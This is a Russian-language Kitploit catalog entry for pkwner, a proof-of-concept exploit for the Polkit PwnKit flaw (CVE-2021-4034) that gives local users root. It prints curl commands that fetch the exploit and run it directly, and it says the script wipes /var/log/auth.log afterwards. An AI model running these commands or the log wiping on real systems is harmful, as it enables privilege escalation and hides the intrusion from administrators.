Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
pkwner — # PoC на Python3 и bash для CVE-2021-4034 от Kim Schulz | Kitploit
Инструменты/GitHubGitHub/kimusan/pkwner
Повышение привилегийАнализ уязвимостейЭксплуатацияПост-эксплуатацияТестирование на ПроникновениеRed Teaming
GitHubkimusan/pkwner

pkwner

# PoC на Python3 и bash для CVE-2021-4034 от Kim Schulz

Репозиторий
2374 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
root@kitploit:~
██████╗ ██╗  ██╗██╗    ██╗███╗   ██╗███████╗██████╗ 
██╔══██╗██║ ██╔╝██║    ██║████╗  ██║██╔════╝██╔══██╗
██████╔╝█████╔╝ ██║ █╗ ██║██╔██╗ ██║█████╗  ██████╔╝
██╔═══╝ ██╔═██╗ ██║███╗██║██║╚██╗██║██╔══╝  ██╔══██╗
██║     ██║  ██╗╚███╔███╔╝██║ ╚████║███████╗██║  ██║
╚═╝     ╚═╝  ╚═╝ ╚══╝╚══╝ ╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝
PoC на Python3 и BASH для CVE-2021-4034 от Kim Schulz

Введение

Это простой PoC для недавно обнаруженной ошибки в Polkit под названием PwnKit.

Я сделал его и как bash, и как python3 скрипт — просто ради удовольствия.

Проблема очень проста в эксплуатации, но имеет огромные последствия, так как легко даёт root-доступ на большинстве Linux-машин, где у атакующего есть доступ локального пользователя.

Как запустить

Эти скрипты выполняются одним запуском, так что просто сделайте

root@kitploit:~
python3 pkwner.py

или

root@kitploit:~
bash pkwner.sh

Вы также можете запустить его напрямую с веб-сервера (например, из этого репозитория GitHub) через:

root@kitploit:~
python3 <(curl https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.py)

или

root@kitploit:~
source <(curl -s https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh))

В обоих случаях это должно выглядеть примерно так: alt text и alt text

Скрипт создаст некоторые файлы и папки, но очистит всё после себя, когда будет получена root-оболочка — он даже очистит /var/log/auth.log (а почему бы и нет).

Благодарности

  • Qualys за обнаружение проблемы и публикацию информации
  • Andris Raugulis за создание одного из первых PoC, вдохновивших на этот
  • MiscGang, потому что misgang@Kalmarunionen — крутые ребята
Скачать инструмент